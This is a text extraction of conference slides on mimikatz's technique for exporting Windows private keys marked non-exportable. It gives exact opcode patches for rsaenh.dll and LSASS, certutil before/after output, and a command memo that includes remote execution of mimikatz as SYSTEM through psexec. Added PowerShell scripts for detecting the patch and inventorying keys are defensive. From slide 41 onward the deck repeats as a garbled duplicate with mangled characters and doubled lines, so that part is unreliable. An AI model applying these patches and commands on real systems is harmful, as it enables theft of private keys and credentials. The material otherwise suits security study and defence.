07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 41
[Flow diagram] Process → CryptoAPI and RSA CSP: Load Private Key (DPAPI decode, PLAYSKOOL) → Ask to export Key → Exportable? yes: Exported Key / no: NTE_BAD_KEY_STATE
mimikatz crypto / patchcapi: because I own my process
When we want to export a certificate with its private key (or only the key), the call goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 42
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER\My'
 - Benjamin Delpy
	Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider      : Microsoft Enhanced Cryptographic Provider v1.0
	Type          : AT_KEYEXCHANGE
	Exportabilité : NON
	Taille clé    : 2048
	Export privé dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz crypto / patchcapi: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space.
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 43
Original (jnz) and patched (nop + jmp) bytes at the two check sites, two bytes changed per site:
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz crypto / patchcapi: demo time
Import, export, import as not exportable… export!
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 44
mimikatz crypto / patchcapi: limitations
Because:
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real-life use
  - Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 45
mimikatz crypto / cng: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
- It is, but it's not perfect…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 46
mimikatz crypto / cng: how it's exported ( level)
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 47
[Flow diagram] Process (CNG) → RPC → KeyIso Service (LSASS process; NT6 system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP): Load Private Key (DPAPI decode, PLAYSKOOL) → Ask to export Key → Exportable? yes: Exported Key / no: NTE_NOT_SUPPORTED
mimikatz crypto / patchcng: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 48
mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité : NON
	Taille clé    : 2048
	Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO ; mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz crypto / patchcng: because sometimes I own LSASS
This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 49
Original (jnz short) and patched (jmp short) bytes at the check site, one byte changed:
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
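Both rewrites on this deck (slide 43: 0F 85 rel32 becomes 90 E9 rel32; slide 49: 75 rel8 becomes EB rel8) change only the opcode bytes and keep the displacement, so the forced jump lands exactly where the conditional one did and the code length is unchanged. The PowerShell below is an added example, not mimikatz code and not from the slides: it takes the expected (on-disk) and observed (in-memory) byte window at one address, decodes both branch targets and reports what changed, which is the comparison a defender runs when checking a loaded rsaenh.dll or ncrypt.dll against its file image. The sample byte windows are the ones printed on slides 43 and 49; `Get-BranchTarget` and `Test-BranchRewrite` are names chosen here.

```powershell
# Added example: classify byte differences at a branch site as the
# "conditional jump forced" pattern (opcode changed, displacement kept).
function Get-BranchTarget {
    # Decodes the destination of a near/short jnz or jmp located at $Address.
    param([int64]$Address, [byte[]]$Bytes)
    if ($Bytes[0] -eq 0x0F -and $Bytes[1] -eq 0x85) {          # jnz rel32 (6 bytes)
        return $Address + 6 + [BitConverter]::ToInt32($Bytes, 2)
    }
    if ($Bytes[0] -eq 0xE9) {                                   # jmp rel32 (5 bytes)
        return $Address + 5 + [BitConverter]::ToInt32($Bytes, 1)
    }
    if ($Bytes[0] -eq 0x75 -or $Bytes[0] -eq 0xEB) {            # jnz short / jmp short (2 bytes)
        $rel8 = [int]$Bytes[1]; if ($rel8 -ge 128) { $rel8 -= 256 }
        return $Address + 2 + $rel8
    }
    return $null
}

function Test-BranchRewrite {
    # Compares the expected (on-disk) and observed (in-memory) bytes at one check site.
    param([int64]$Address, [byte[]]$Expected, [byte[]]$Observed)
    $changed = @()
    for ($i = 0; $i -lt $Expected.Length; $i++) {
        if ($Expected[$i] -ne $Observed[$i]) { $changed += $i }
    }
    $before = Get-BranchTarget -Address $Address -Bytes $Expected
    # A 0F 85 -> 90 E9 rewrite leaves a nop first, so the jmp is decoded from Address+1.
    $after = if ($Observed[0] -eq 0x90) {
        Get-BranchTarget -Address ($Address + 1) -Bytes $Observed[1..($Observed.Length - 1)]
    } else {
        Get-BranchTarget -Address $Address -Bytes $Observed
    }
    $verdict = if ($changed.Count -eq 0) { 'unmodified' }
               elseif ($null -ne $before -and $before -eq $after) { 'conditional jump forced: opcode changed, target preserved' }
               else { 'modified (other)' }
    [pscustomobject]@{
        Address        = '0x{0:X8}' -f $Address
        ChangedOffsets = ($changed -join ',')
        ExpectedTarget = '0x{0:X8}' -f $before
        ObservedTarget = '0x{0:X8}' -f $after
        Verdict        = $verdict
    }
}

# Constructed samples: the three check sites from slides 43 and 49, original bytes vs patched bytes.
$sites = @(
    Test-BranchRewrite -Address 0x0AC0B7CB -Expected (0x0F,0x85,0x33,0xC7,0xFF,0xFF) -Observed (0x90,0xE9,0x33,0xC7,0xFF,0xFF)
    Test-BranchRewrite -Address 0x0AC1F749 -Expected (0x0F,0x85,0xB6,0x3B,0xFF,0xFF) -Observed (0x90,0xE9,0xB6,0x3B,0xFF,0xFF)
    Test-BranchRewrite -Address 0x6C815210 -Expected (0x75,0x1C) -Observed (0xEB,0x1C)
)
$sites | Format-Table -AutoSize
```

For the three sample sites the decoded targets are 0x0AC07F04, 0x0AC13305 and 0x6C81522E, identical before and after the rewrite, with offsets 0,1 changed on the two CAPI sites (the "4 bytes" of slide 43) and offset 0 on the CNG site (the "1 byte" of slide 49). Because the length and target do not move, only a byte-level comparison against the on-disk image catches this; a check that merely validates that the branch still points into the right function will not.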
mimikatz crypto / patchcng: demo time
Import, export, import as not exportable… export again!
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 50
mimikatz crypto / patchcng: limitations
Patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?)
- certutil can…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 51
mimikatz crypto / patchcng: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
- Yeah, like the good old certutil!
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 52
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz crypto: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  - So yes, mimikatz can export it
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 53
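The two remarks about keys in the memo (re-importing a certificate creates duplicate key containers, deleting a certificate leaves its private key behind) mean a store can hold more private keys than certificates, and those leftover keys are exportable by anyone who controls the process or LSASS just like the referenced ones. The PowerShell below is an added example, not part of the deck or of mimikatz: it collects the container names that the default RSA CSP and the Microsoft Software Key Storage Provider know about from `certutil -key`, matches them against the containers actually referenced by certificates in the stores, and reports orphaned and shared containers. It assumes that certutil's `-key` listing prints each container name on its own indented line followed by its key spec or algorithm (a heuristic written against the English output; check it on your locale before relying on it), that .NET Framework 4.6 or later is available for `RSACertificateExtensions`, and that only RSA keys matter; `Get-KeyContainerReport` is a name chosen here.

```powershell
# Added example: find private-key containers with no (or several) referencing certificates.
function Get-KeyContainerReport {
    param([switch]$Machine)   # default: current user scope, matching "certutil -user -key"

    $storeRoot = if ($Machine) { 'Cert:\LocalMachine' } else { 'Cert:\CurrentUser' }
    $scopeArgs = if ($Machine) { @() } else { @('-user') }
    $ext = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]

    # 1. Container names referenced by certificates in any store under this scope.
    $byContainer = @{}   # container name -> thumbprints of certificates using it
    $certs = Get-ChildItem -Path $storeRoot -Recurse -ErrorAction SilentlyContinue |
             Where-Object { $_.PSIsContainer -eq $false -and $_.HasPrivateKey }
    foreach ($cert in $certs) {
        $name = $null
        try {
            $rsa = $ext::GetRSAPrivateKey($cert)
            if ($rsa -is [System.Security.Cryptography.RSACng]) {
                $name = $rsa.Key.KeyName                              # CNG key name in the KSP
            } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                $name = $rsa.CspKeyContainerInfo.KeyContainerName    # CAPI container name (a GUID)
            }
        } catch { }
        if ($name) {
            if (-not $byContainer.ContainsKey($name)) { $byContainer[$name] = @() }
            $byContainer[$name] += $cert.Thumbprint
        }
    }

    # 2. Container names the providers know about: default RSA CSP, then the software KSP.
    #    Heuristic (assumption): indented lines are container names unless they look like
    #    a key spec (AT_KEYEXCHANGE, AT_SIGNATURE) or an algorithm name (RSA, ECDSA_P256, ...).
    $listing = @(& certutil @scopeArgs -key 2>$null) +
               @(& certutil @scopeArgs -csp 'Microsoft Software Key Storage Provider' -key 2>$null)
    $known = foreach ($line in $listing) {
        if ($line -match '^\s+(\S.*)$' -and $Matches[1] -notmatch '^(AT_\w+|RSA|DSA|DH|ECD\w+)$') {
            $Matches[1].Trim()
        }
    }

    foreach ($name in ($known | Sort-Object -Unique)) {
        $count = if ($byContainer.ContainsKey($name)) { $byContainer[$name].Count } else { 0 }
        $status = if ($count -eq 0) { 'orphaned: no certificate references this key' }
                  elseif ($count -gt 1) { 'shared by several certificates' }
                  else { 'in use' }
        [pscustomobject]@{ Container = $name; Certificates = $count; Status = $status }
    }
}

# Report everything that is not a plain one-certificate-one-key pairing.
Get-KeyContainerReport | Where-Object { $_.Status -ne 'in use' } | Format-Table -AutoSize
```

Duplicate containers left behind by repeated imports show up as orphans too, since only the most recent import is referenced by the certificate. Once a container is confirmed unused, `certutil -delkey` (with `-user` or `-csp` as appropriate) removes it; leaving it in place keeps a private key around that no certificate inventory will ever show.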
mimikatz crypto: what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts / computer
- no admin, no admin, no admin…
Basics:
- Use smartcards / tokens for user certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
- See what Microsoft can do with the TPM from Windows 8
  - Virtual SmartCard seems promising
- Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  - Their biometrics stuff was a little buggy ;)
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 54
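The recommendations above (smartcards or tokens, HSM, TPM-backed providers) start with knowing which keys are still held in software, and by which API. The PowerShell below is an added example, not part of the deck or of mimikatz: it walks the personal certificate stores and reports, for each certificate with a private key, whether the key is reached through CAPI (a CSP loaded inside the calling process, slide 40) or CNG (a KSP behind the keyiso RPC interface in LSASS, slide 46), which provider holds it, whether it is flagged exportable, and whether it sits in hardware. It assumes Windows PowerShell 5.1 or later with .NET Framework 4.6 or newer, covers RSA keys only (others are reported as 'other'), and uses a provider-name match to recognise the Microsoft smart-card and Platform Crypto (TPM) KSPs; `Get-PrivateKeyInventory` and that name match are choices made here, not Windows conventions.

```powershell
# Added example: inventory where each certificate's private key lives (CAPI CSP, CNG KSP, hardware).
function Get-PrivateKeyInventory {
    param([string[]]$StorePaths = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    $ext = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]
    foreach ($path in $StorePaths) {
        foreach ($cert in Get-ChildItem -Path $path -ErrorAction SilentlyContinue) {
            if (-not $cert.HasPrivateKey) { continue }
            $api = 'other'; $provider = ''; $exportable = $null; $hardware = $false
            try {
                # Opening the key handle can prompt for a PIN when the key is on a smart card.
                $rsa = $ext::GetRSAPrivateKey($cert)
                if ($rsa -is [System.Security.Cryptography.RSACng]) {
                    # CNG: the key is held by a KSP reached over RPC (keyiso in LSASS);
                    # ExportPolicy is the flag ncrypt checks before handing the key out.
                    $api        = 'CNG'
                    $provider   = $rsa.Key.Provider.Provider
                    $exportable = $rsa.Key.ExportPolicy -ne [System.Security.Cryptography.CngExportPolicies]::None
                    # Assumption: hardware-backed Microsoft KSPs are recognised by name; extend for third-party KSPs.
                    $hardware   = $provider -match 'Smart Card|Platform Crypto'
                } elseif ($rsa -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                    # CAPI: the key is handled by a CSP loaded in the calling process
                    # (rsaenh.dll for all the Microsoft RSA CSPs listed on slide 45).
                    $info       = $rsa.CspKeyContainerInfo
                    $api        = 'CAPI'
                    $provider   = $info.ProviderName
                    $exportable = $info.Exportable
                    $hardware   = $info.HardwareDevice
                }
            } catch {
                $provider = "error: $($_.Exception.Message)"
            }
            [pscustomobject]@{
                Store      = $path
                Subject    = $cert.Subject
                Thumbprint = $cert.Thumbprint
                Api        = $api
                Provider   = $provider
                Exportable = $exportable
                InHardware = $hardware
            }
        }
    }
}

# Software-held keys are the ones a process-level (CAPI) or LSASS-level (CNG) patch can reach.
Get-PrivateKeyInventory | Where-Object { -not $_.InHardware } | Format-Table -AutoSize
```

Read the Exportable column as what the provider will refuse, not as a guarantee: the two patches on this deck make a non-exportable software key exportable from the process (CAPI) or from LSASS (CNG). Only the rows with InHardware set to True describe keys whose material never enters either memory space, which is why the basics on slide 54 are smartcards, tokens and HSMs rather than the export flag.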
mimikatz: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
- Play with tokens & privileges
- Display SSDT x86 & x64
- List minifilters actions
- List Notifications (process, thread, image, registry)
- List Objects hooks and procedures
- …
…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 55
mimikatz: that's all folks
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  - Partners and Sponsors, for sure
- Microsoft for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  - nagual, newsoft, mubix, …
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 56
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com / blog.gentilkiwi.com 57
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
